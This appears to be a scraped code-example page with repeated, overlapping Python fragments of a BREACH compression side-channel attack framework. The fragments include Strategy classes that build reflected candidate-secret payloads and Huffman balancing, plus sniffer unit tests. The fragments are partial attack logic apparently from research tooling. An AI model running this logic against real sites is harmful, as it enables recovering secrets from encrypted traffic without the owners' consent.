Beispiel #1
0
    def __init__(self, victim):
        self._victim = victim

        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(
            victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        self._round = Round.objects.filter(victim=self._victim,
                                           index=current_round_index)[0]
        self._analyzed = False
Beispiel #2
0
 def setUp(self):
     self.endpoint = 'http://localhost'
     sniffer_params = {
         'snifferendpoint': self.endpoint,
         'sourceip': '147.102.239.229',
         'host': 'dionyziz.com',
         'interface': 'wlan0',
         'port': '8080',
         'calibration_wait': 0.0
     }
     self.sniffer = Sniffer(sniffer_params)
Beispiel #3
0
    def __init__(self, victim):
        self._victim = victim
        self._sniffer = Sniffer(victim.snifferendpoint, self._victim.sourceip, self._victim.target.host, self._victim.interface, self._victim.target.port)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            self.begin_attack()

        self._round = Round.objects.filter(victim=self._victim, index=current_round_index)[0]
        self._analyzed = False
Beispiel #4
0
    def __init__(self, victim):
        self._victim = victim

        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        self._round = Round.objects.filter(
            victim=self._victim,
            index=current_round_index
        )[0]
        self._analyzed = False
Beispiel #5
0
class SnifferTest(TestCase):
    def setUp(self):
        self.endpoint = 'http://localhost'
        sniffer_params = {
            'snifferendpoint': self.endpoint,
            'sourceip': '147.102.239.229',
            'host': 'dionyziz.com',
            'interface': 'wlan0',
            'port': '8080',
            'calibration_wait': 0.0
        }
        self.sniffer = Sniffer(sniffer_params)

    @patch('breach.sniffer.requests')
    def test_sniffer_start(self, requests):
        self.sniffer.start()
        self.assertTrue(requests.post.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_read(self, requests):
        self.sniffer.read()
        self.assertTrue(requests.get.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_delete(self, requests):
        self.sniffer.delete()
        self.assertTrue(requests.post.called)
Beispiel #6
0
class SnifferTest(TestCase):
    def setUp(self):
        self.endpoint = 'http://localhost'
        self.sniffer = Sniffer(self.endpoint)

        self.source_ip = '147.102.239.229'
        self.destination_host = 'dionyziz.com'

    @patch('breach.sniffer.requests')
    def test_sniffer_start(self, requests):
        self.sniffer.start(self.source_ip, self.destination_host)
        self.assertTrue(requests.post.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_read(self, requests):
        self.sniffer.read(self.source_ip, self.destination_host)
        self.assertTrue(requests.get.called)

    @patch('breach.sniffer.requests')
    def test_sniffer_delete(self, requests):
        self.sniffer.delete(self.source_ip, self.destination_host)
        self.assertTrue(requests.post.called)
Beispiel #7
0
    def setUp(self):
        self.endpoint = 'http://localhost'
        self.sniffer = Sniffer(self.endpoint)

        self.source_ip = '147.102.239.229'
        self.destination_host = 'dionyziz.com'
Beispiel #8
0
class Strategy(object):
    def __init__(self, victim):
        self._victim = victim

        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(
            victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        self._round = Round.objects.filter(victim=self._victim,
                                           index=current_round_index)[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        candidate_alphabet_cardinality = len(state['knownalphabet']) / 2

        bottom_half = state['knownalphabet'][:candidate_alphabet_cardinality]
        top_half = state['knownalphabet'][candidate_alphabet_cardinality:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        return state['knownalphabet']

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        methods = {
            Target.SERIAL: self._build_candidates_serial,
            Target.DIVIDE_CONQUER: self._build_candidates_divide_conquer
        }
        return methods[self._round.get_method()](state)

    def _get_first_round_state(self):
        return {
            'knownsecret': self._victim.target.prefix,
            'candidatealphabet': self._victim.target.alphabet,
            'knownalphabet': self._victim.target.alphabet
        }

    def _get_unstarted_samplesets(self):
        return SampleSet.objects.filter(round=self._round, started=None)

    def _reflection(self, alphabet):
        # We use sentinel as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.

        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = self._victim.target.sentinel

        assert (sentinel not in self._round.knownalphabet)
        knownalphabet_complement = list(
            set(string.ascii_letters + string.digits) -
            set(self._round.knownalphabet))

        candidate_secrets = set()
        for letter in alphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(
            candidate_secrets)
        assert (len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [
            self._round.knownsecret + c
            for c in knownalphabet_complement[0:candidate_balance]
        ]

        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance), ''
        ]

        if self._round.check_huffman_pool():
            # Huffman complement indicates the knownalphabet symbols that are not currently being tested
            huffman_complement = set(self._round.knownalphabet) - set(alphabet)

            huffman_balance = added_symbols - len(candidate_balance)

            assert (len(knownalphabet_complement) >
                    len(candidate_balance) + huffman_balance)

            huffman_balance = knownalphabet_complement[len(candidate_balance
                                                           ):huffman_balance]
            reflected_data.insert(
                1, sentinel.join(list(huffman_complement) + huffman_balance))

        reflection = sentinel.join(reflected_data)

        return reflection

    def _url(self, alphabet):
        return self._victim.target.endpoint % self._reflection(alphabet)

    def _sampleset_to_work(self, sampleset):
        return {
            'url': self._url(sampleset.candidatealphabet),
            'amount': self._victim.target.samplesize,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        # If analysis is complete or maxreflectionlength cannot be overcome
        # then execution should abort
        if self._analyzed:
            logger.debug('Aborting get_work because analysis is completed')
            return {}

        # Reaps a hanging sampleset that may exist from previous framework execution
        # Hanging sampleset condition: backend or realtime crash
        hanging_samplesets = self._get_started_samplesets()
        for s in hanging_samplesets:
            logger.warning('Reaping hanging set for: {}'.format(
                s.candidatealphabet))
            self._mark_current_work_completed(sampleset=s)

        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning(
                    'Caught {} while trying to start sniffer.'.format(
                        status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError,
                            requests.exceptions.ConnectionError), err:
                        logger.warning(
                            'Caught error when trying to delete sniffer: {}'.
                            format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')
Beispiel #9
0
class Strategy(object):
    def __init__(self, victim):
        self._victim = victim
        self._sniffer = Sniffer(victim.snifferendpoint, self._victim.sourceip, self._victim.target.host, self._victim.interface, self._victim.target.port)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            self.begin_attack()

        self._round = Round.objects.filter(victim=self._victim, index=current_round_index)[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        candidate_alphabet_cardinality = len(state['knownalphabet']) / 2

        bottom_half = state['knownalphabet'][:candidate_alphabet_cardinality]
        top_half = state['knownalphabet'][candidate_alphabet_cardinality:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        return state['knownalphabet']

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        methods = {
            'serial': self._build_candidates_serial,
            'divide&conquer': self._build_candidates_divide_conquer
        }
        return methods[self._victim.method](state)

    def _get_first_round_state(self):
        return {
            'knownsecret': self._victim.target.prefix,
            'candidatealphabet': self._victim.target.alphabet,
            'knownalphabet': self._victim.target.alphabet
        }

    def _get_unstarted_samplesets(self):
        return SampleSet.objects.filter(
            round=self._round,
            started=None
        )

    def _reflection(self, sampleset):
        # We use '^' as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.
        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = '^'

        assert(sentinel not in self._round.knownalphabet)
        knownalphabet_complement = list(set(string.ascii_letters + string.digits) - set(self._round.knownalphabet))

        candidate_secrets = set()
        for letter in sampleset.candidatealphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(candidate_secrets)
        assert(len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [self._round.knownsecret + c for c in knownalphabet_complement[0:candidate_balance]]

        # Huffman complement indicates the knownalphabet symbols that are not currently being tested
        huffman_complement = set(self._round.knownalphabet) - set(sampleset.candidatealphabet)

        huffman_balance = added_symbols - len(candidate_balance)
        assert(len(knownalphabet_complement) > len(candidate_balance) + huffman_balance)
        huffman_balance = knownalphabet_complement[len(candidate_balance):huffman_balance]

        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance),
            sentinel.join(list(huffman_complement) + huffman_balance),
            ''
        ]

        reflection = sentinel.join(reflected_data)

        return reflection

    def _sampleset_to_work(self, sampleset):
        return {
            'url': self._victim.target.endpoint % self._reflection(sampleset),
            'amount': SAMPLES_PER_SAMPLESET,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning('Caught {} while trying to start sniffer.'.format(status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError, requests.exceptions.ConnectionError), err:
                        logger.warning('Caught error when trying to delete sniffer: {}'.format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')
Beispiel #10
0
class Strategy(object):
    def __init__(self, victim):
        self._victim = victim

        sniffer_params = {
            'snifferendpoint': self._victim.snifferendpoint,
            'sourceip': self._victim.sourceip,
            'host': self._victim.target.host,
            'interface': self._victim.interface,
            'port': self._victim.target.port,
            'calibration_wait': self._victim.calibration_wait
        }
        self._sniffer = Sniffer(sniffer_params)

        # Extract maximum round index for the current victim.
        current_round_index = Round.objects.filter(victim=self._victim).aggregate(Max('index'))['index__max']

        if not current_round_index:
            current_round_index = 1
            self._analyzed = True
            try:
                self._begin_attack()
            except MaxReflectionLengthError:
                # If the initial round or samplesets cannot be created, end the analysis
                return

        self._round = Round.objects.filter(
            victim=self._victim,
            index=current_round_index
        )[0]
        self._analyzed = False

    def _build_candidates_divide_conquer(self, state):
        candidate_alphabet_cardinality = len(state['knownalphabet']) / 2

        bottom_half = state['knownalphabet'][:candidate_alphabet_cardinality]
        top_half = state['knownalphabet'][candidate_alphabet_cardinality:]

        return [bottom_half, top_half]

    def _build_candidates_serial(self, state):
        return state['knownalphabet']

    def _build_candidates(self, state):
        '''Given a state of the world, produce a list of candidate alphabets.'''
        methods = {
            Target.SERIAL: self._build_candidates_serial,
            Target.DIVIDE_CONQUER: self._build_candidates_divide_conquer
        }
        return methods[self._round.get_method()](state)

    def _get_first_round_state(self):
        return {
            'knownsecret': self._victim.target.prefix,
            'candidatealphabet': self._victim.target.alphabet,
            'knownalphabet': self._victim.target.alphabet
        }

    def _get_unstarted_samplesets(self):
        return SampleSet.objects.filter(
            round=self._round,
            started=None
        )

    def _reflection(self, alphabet):
        # We use sentinel as a separator symbol and we assume it is not part of the
        # secret. We also assume it will not be in the content.

        # Added symbols are the total amount of dummy symbols that need to be added,
        # either in candidate alphabet or huffman complement set in order
        # to avoid huffman tree imbalance between samplesets of the same batch.

        added_symbols = self._round.maxroundcardinality - self._round.minroundcardinality

        sentinel = self._victim.target.sentinel

        assert(sentinel not in self._round.knownalphabet)
        knownalphabet_complement = list(set(string.ascii_letters + string.digits) - set(self._round.knownalphabet))

        candidate_secrets = set()
        for letter in alphabet:
            candidate_secret = self._round.knownsecret + letter
            candidate_secrets.add(candidate_secret)

        # Candidate balance indicates the amount of dummy symbols that will be included with the
        # candidate alphabet's part of the reflection.
        candidate_balance = self._round.maxroundcardinality - len(candidate_secrets)
        assert(len(knownalphabet_complement) > candidate_balance)
        candidate_balance = [self._round.knownsecret + c for c in knownalphabet_complement[0:candidate_balance]]

        reflected_data = [
            '',
            sentinel.join(list(candidate_secrets) + candidate_balance),
            ''
        ]

        if self._round.check_huffman_pool():
            # Huffman complement indicates the knownalphabet symbols that are not currently being tested
            huffman_complement = set(self._round.knownalphabet) - set(alphabet)

            huffman_balance = added_symbols - len(candidate_balance)

            assert(len(knownalphabet_complement) > len(candidate_balance) + huffman_balance)

            huffman_balance = knownalphabet_complement[len(candidate_balance):huffman_balance]
            reflected_data.insert(1, sentinel.join(list(huffman_complement) + huffman_balance))

        reflection = sentinel.join(reflected_data)

        return reflection

    def _url(self, alphabet):
        return self._victim.target.endpoint % self._reflection(alphabet)

    def _sampleset_to_work(self, sampleset):
        return {
            'url': self._url(sampleset.candidatealphabet),
            'amount': self._victim.target.samplesize,
            'alignmentalphabet': sampleset.alignmentalphabet,
            'timeout': 0
        }

    def get_work(self):
        '''Produces work for the victim.

        Pre-condition: There is already work to do.'''

        # If analysis is complete or maxreflectionlength cannot be overcome
        # then execution should abort
        if self._analyzed:
            logger.debug('Aborting get_work because analysis is completed')
            return {}

        # Reaps a hanging sampleset that may exist from previous framework execution
        # Hanging sampleset condition: backend or realtime crash
        hanging_samplesets = self._get_started_samplesets()
        for s in hanging_samplesets:
            logger.warning('Reaping hanging set for: {}'.format(s.candidatealphabet))
            self._mark_current_work_completed(sampleset=s)

        try:
            self._sniffer.start()
        except (requests.HTTPError, requests.exceptions.ConnectionError), err:
            if isinstance(err, requests.HTTPError):
                status_code = err.response.status_code
                logger.warning('Caught {} while trying to start sniffer.'.format(status_code))

                # If status was raised due to conflict,
                # delete already existing sniffer.
                if status_code == 409:
                    try:
                        self._sniffer.delete()
                    except (requests.HTTPError, requests.exceptions.ConnectionError), err:
                        logger.warning('Caught error when trying to delete sniffer: {}'.format(err))

            elif isinstance(err, requests.exceptions.ConnectionError):
                logger.warning('Caught ConnectionError')